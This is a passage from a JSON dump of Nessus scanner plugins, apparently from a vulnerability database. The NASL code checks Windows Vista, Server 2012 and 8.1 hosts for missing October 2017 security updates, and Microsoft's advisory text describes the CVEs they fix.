smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nwinsxs = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\\WinSxS\", string:systemroot);\nwinsxs_share = hotfix_path2share(path:systemroot);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:winsxs_share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, winsxs_share);\n}\n\nthe_session = make_array(\n 'login', login,\n 'password', pass,\n 'domain', domain,\n 'share', winsxs_share\n);\n\nvuln = 0;\n\n# 4041671\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"os-kernel_31bf3856ad364e35\", file_pat:\"^ntoskrnl\\.exe$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24202'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4041671\", session:the_session);\n\n# 4041944\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"ntfs_31bf3856ad364e35\", file_pat:\"^ntfs\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24201'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4041944\", session:the_session);\n\n# 4041995\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"smbserver-common_31bf3856ad364e35\", file_pat:\"^srvnet\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24201'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4041995\", session:the_session);\n\n# 4042067\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"c..ent-indexing-common_31bf3856ad364e35\", file_pat:\"^query\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24201'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4042067\", session:the_session);\n\n# 4042120\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"win32k_31bf3856ad364e35\", 
file_pat:\"^win32k\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24200'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4042120\", session:the_session);\n\n# 4042121\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"gdi32_31bf3856ad364e35\", file_pat:\"^gdi32\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24200'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4042121\", session:the_session);\n\n# 4050795 (fix for 4042007)\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"m..components-jetexcel_31bf3856ad364e35\", file_pat:\"^msexcl40\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('4.0.9801.2'),\n max_versions:make_list('4.0.9801.9999'),\n bulletin:bulletin,\n kb:\"4050795\", session:the_session);\n\n# 4042122\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"font-embedding_31bf3856ad364e35\", file_pat:\"^t2embed\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24200'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4042122\", session:the_session);\n\n# 4042050\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"mponents-jetintlerr_31bf3856ad364e35\", file_pat:\"^msjint40\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('4.0.9801.1'),\n max_versions:make_list('4.0.9801.9999'),\n bulletin:bulletin,\n kb:\"4042050\", session:the_session);\n\n# The following two checks are commented out\n# due to released patches failing to apply\n# to relavant systems.\n## 4042123\n#files = list_dir(basedir:winsxs, level:0, dir_pat:\"t..icesframework-msctf_31bf3856ad364e35\", file_pat:\"^msctf\\.dll$\", max_recurse:1);\n#vuln += hotfix_check_winsxs(os:'6.0',\n# 
sp:2,\n# files:files,\n# versions:make_list('6.0.6002.16386', '6.0.6002.24202'),\n# max_versions:make_list('6.0.6002.20000', '6.0.6002.99999'),\n# bulletin:bulletin,\n# kb:\"4042123\", session:the_session);\n#\n## 4042723\n#files = list_dir(basedir:winsxs, level:0, dir_pat:\"wlansvc_31bf3856ad364e35\", file_pat:\"^wlanapi\\.dll$\", max_recurse:1);\n#vuln += hotfix_check_winsxs(os:'6.0',\n# sp:2,\n# files:files,\n# versions:make_list('6.0.6001.18000', '6.0.6002.24202'),\n# max_versions:make_list('6.0.6001.20000', '6.0.6002.99999'),\n# bulletin:bulletin,\n# kb:\"4042723\", session:the_session);\n\nif (vuln > 0)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:18:16", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4041687\nor cumulative update 4041693. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory\n via the Microsoft Windows Text Services Framework. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8727)\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. 
An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel-mode driver fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8689, CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft\n JET Database Engine that could allow remote code\n execution on an affected system. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8717,\n CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the\n way that the Windows SMB Server handles certain\n requests. 
An authenticated attacker who successfully\n exploited this vulnerability could craft a special\n packet, which could lead to information disclosure from\n the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-11762,\n CVE-2017-11763)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the\n Microsoft Server Block Message (SMB) when an attacker\n sends specially crafted requests to the server. An\n attacker who exploited this vulnerability could cause\n the affected system to crash. 
To attempt to exploit this\n issue, an attacker would need to send specially crafted\n SMB requests to the target system. Note that the denial\n of service vulnerability would not allow an attacker to\n execute code or to elevate their user rights, but it\n could cause the affected system to stop accepting\n requests. The security update addresses the\n vulnerability by correcting the manner in which SMB\n handles specially crafted client requests.\n (CVE-2017-11781)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11783)\n\n - An Information disclosure vulnerability exists when\n Windows Search improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11772)\n\n - An Security Feature bypass vulnerability exists in\n Microsoft Windows storage when it fails to validate an\n integrity-level check. An attacker who successfully\n exploited the vulnerability could allow an application\n with a certain integrity level to execute code at a\n different integrity level. The update addresses the\n vulnerability by correcting how Microsoft storage\n validates an integrity-level check. (CVE-2017-11818)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. 
An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2017-11780)\n\n - A remote code execution vulnerability\n exists in Windows Domain Name System (DNS) DNSAPI.dll\n when it fails to properly handle DNS responses. An\n attacker who successfully exploited the vulnerability\n could run arbitrary code in the context of the Local\n System Account. (CVE-2017-11779)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11813,\n CVE-2017-11822)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-11784,\n CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows\n implementation of wireless networking. An attacker who\n successfully exploited this vulnerability could\n potentially replay broadcast and/or multicast traffic\n to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS17_OCT_4041693.NASL", "href": "https://www.tenable.com/plugins/nessus/103750", "published": "2017-10-10T00:00:00", "title": "Windows 8.1 and Windows Server 2012 R2 October 2017 Security Updates (KRACK)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103750);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-8689\",\n \"CVE-2017-8694\",\n \"CVE-2017-8717\",\n \"CVE-2017-8718\",\n \"CVE-2017-8727\",\n \"CVE-2017-11762\",\n \"CVE-2017-11763\",\n \"CVE-2017-11765\",\n \"CVE-2017-11771\",\n \"CVE-2017-11772\",\n \"CVE-2017-11779\",\n \"CVE-2017-11780\",\n \"CVE-2017-11781\",\n \"CVE-2017-11783\",\n \"CVE-2017-11784\",\n \"CVE-2017-11785\",\n \"CVE-2017-11790\",\n \"CVE-2017-11793\",\n \"CVE-2017-11810\",\n \"CVE-2017-11813\",\n \"CVE-2017-11814\",\n \"CVE-2017-11815\",\n \"CVE-2017-11816\",\n \"CVE-2017-11817\",\n \"CVE-2017-11818\",\n \"CVE-2017-11822\",\n \"CVE-2017-11824\",\n \"CVE-2017-13080\"\n );\n script_bugtraq_id(\n 101077,\n 101081,\n 101083,\n 101093,\n 101094,\n 101095,\n 101099,\n 101100,\n 101101,\n 101108,\n 101109,\n 101110,\n 101111,\n 101114,\n 101116,\n 101122,\n 101128,\n 101136,\n 101140,\n 101141,\n 101142,\n 101144,\n 101147,\n 101149,\n 101161,\n 101162,\n 101166,\n 101274\n );\n script_xref(name:\"MSKB\", value:\"4041687\");\n script_xref(name:\"IAVA\", value:\"2017-A-0310\");\n script_xref(name:\"MSKB\", value:\"4041693\");\n script_xref(name:\"MSFT\", value:\"MS17-4041687\");\n script_xref(name:\"MSFT\", value:\"MS17-4041693\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 October 2017 Security Updates (KRACK)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4041687\nor cumulative update 4041693. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory\n via the Microsoft Windows Text Services Framework. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8727)\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel-mode driver fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8689, CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft\n JET Database Engine that could allow remote code\n execution on an affected system. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. 
Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8717,\n CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the\n way that the Windows SMB Server handles certain\n requests. An authenticated attacker who successfully\n exploited this vulnerability could craft a special\n packet, which could lead to information disclosure from\n the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. 
An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-11762,\n CVE-2017-11763)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the\n Microsoft Server Block Message (SMB) when an attacker\n sends specially crafted requests to the server. An\n attacker who exploited this vulnerability could cause\n the affected system to crash. To attempt to exploit this\n issue, an attacker would need to send specially crafted\n SMB requests to the target system. Note that the denial\n of service vulnerability would not allow an attacker to\n execute code or to elevate their user rights, but it\n could cause the affected system to stop accepting\n requests. The security update addresses the\n vulnerability by correcting the manner in which SMB\n handles specially crafted client requests.\n (CVE-2017-11781)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11783)\n\n - An Information disclosure vulnerability exists when\n Windows Search improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. 
(CVE-2017-11772)\n\n - An Security Feature bypass vulnerability exists in\n Microsoft Windows storage when it fails to validate an\n integrity-level check. An attacker who successfully\n exploited the vulnerability could allow an application\n with a certain integrity level to execute code at a\n different integrity level. The update addresses the\n vulnerability by correcting how Microsoft storage\n validates an integrity-level check. (CVE-2017-11818)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2017-11780)\n\n - A remote code execution vulnerability\n exists in Windows Domain Name System (DNS) DNSAPI.dll\n when it fails to properly handle DNS responses. An\n attacker who successfully exploited the vulnerability\n could run arbitrary code in the context of the Local\n System Account. (CVE-2017-11779)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11813,\n CVE-2017-11822)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-11784,\n CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows\n implementation of wireless networking. 
An attacker who\n successfully exploited this vulnerability could\n potentially replay broadcast and/or multicast traffic\n to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)\");\n # https://support.microsoft.com/en-us/help/4041687/windows-81-update-kb4041687\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c1c67d5c\");\n # https://support.microsoft.com/en-us/help/4041693/windows-81-update-kb4041693\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c3325f2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4041687 or Cumulative update KB4041693.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11771\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright 
(C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-10\";\nkbs = make_list('4041687', '4041693');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"10_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4041687, 4041693])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:18:15", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4041679\nor cumulative update 4041690. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory\n via the Microsoft Windows Text Services Framework. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8727)\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel-mode driver fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft\n JET Database Engine that could allow remote code\n execution on an affected system. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. 
Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8717,\n CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the\n way that the Windows SMB Server handles certain\n requests. An authenticated attacker who successfully\n exploited this vulnerability could craft a special\n packet, which could lead to information disclosure from\n the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. 
An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-11762,\n CVE-2017-11763)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the\n Microsoft Server Block Message (SMB) when an attacker\n sends specially crafted requests to the server. An\n attacker who exploited this vulnerability could cause\n the affected system to crash. To attempt to exploit this\n issue, an attacker would need to send specially crafted\n SMB requests to the target system. Note that the denial\n of service vulnerability would not allow an attacker to\n execute code or to elevate their user rights, but it\n could cause the affected system to stop accepting\n requests. The security update addresses the\n vulnerability by correcting the manner in which SMB\n handles specially crafted client requests.\n (CVE-2017-11781)\n\n - An information disclosure vulnerability exists when\n Windows Search improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2017-11772)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2017-11780)\n\n - A remote code execution vulnerability\n exists in Windows Domain Name System (DNS) DNSAPI.dll\n when it fails to properly handle DNS responses. 
An\n attacker who successfully exploited the vulnerability\n could run arbitrary code in the context of the Local\n System Account. (CVE-2017-11779)\n\n - A Security Feature bypass vulnerability exists in\n Microsoft Windows storage when it fails to validate an\n integrity-level check. An attacker who successfully\n exploited the vulnerability could allow an application\n with a certain integrity level to execute code at a\n different integrity level. The update addresses the\n vulnerability by correcting how Microsoft storage\n validates an integrity-level check. (CVE-2017-11818)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-11784,\n CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows\n implementation of wireless networking. An attacker who\n successfully exploited this vulnerability could\n potentially replay broadcast and/or multicast traffic\n to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS17_OCT_4041690.NASL", "href": "https://www.tenable.com/plugins/nessus/103748", "published": "2017-10-10T00:00:00", "title": "Windows Server 2012 October 2017 Security Updates (KRACK)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103748);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-8694\",\n \"CVE-2017-8717\",\n \"CVE-2017-8718\",\n \"CVE-2017-8727\",\n \"CVE-2017-11762\",\n \"CVE-2017-11763\",\n \"CVE-2017-11765\",\n \"CVE-2017-11771\",\n \"CVE-2017-11772\",\n \"CVE-2017-11779\",\n \"CVE-2017-11780\",\n \"CVE-2017-11781\",\n \"CVE-2017-11784\",\n \"CVE-2017-11785\",\n \"CVE-2017-11790\",\n \"CVE-2017-11793\",\n \"CVE-2017-11810\",\n \"CVE-2017-11814\",\n \"CVE-2017-11815\",\n \"CVE-2017-11816\",\n \"CVE-2017-11817\",\n \"CVE-2017-11818\",\n \"CVE-2017-11824\",\n \"CVE-2017-13080\"\n );\n script_bugtraq_id(\n 101077,\n 101081,\n 101093,\n 101094,\n 101095,\n 101099,\n 101100,\n 101101,\n 101108,\n 101109,\n 101110,\n 101111,\n 101114,\n 101116,\n 101136,\n 101140,\n 101141,\n 101142,\n 101147,\n 101149,\n 101161,\n 101162,\n 101166,\n 101274\n );\n script_xref(name:\"MSKB\", value:\"4041690\");\n script_xref(name:\"IAVA\", value:\"2017-A-0310\");\n script_xref(name:\"MSKB\", value:\"4041679\");\n script_xref(name:\"MSFT\", value:\"MS17-4041690\");\n script_xref(name:\"MSFT\", value:\"MS17-4041679\");\n\n script_name(english:\"Windows Server 2012 October 2017 Security Updates (KRACK)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4041679\nor cumulative update 4041690. It is, therefore, affected 